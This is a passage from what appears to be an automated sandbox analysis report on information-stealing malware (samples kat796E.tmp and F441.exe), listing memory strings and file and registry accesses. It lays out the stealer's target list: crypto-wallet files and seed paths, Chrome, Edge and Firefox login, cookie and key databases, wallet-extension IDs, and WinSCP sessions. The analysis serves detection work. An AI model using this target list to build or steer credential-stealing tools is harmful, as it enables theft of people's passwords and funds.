Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: F441.exe, 00000006.00000003.2351445526.0000000000573000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: F441.exe, 00000006.00000003.2416372141.00000000005C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Opens network shares

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: \\config\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: \\config\			Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\F441.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
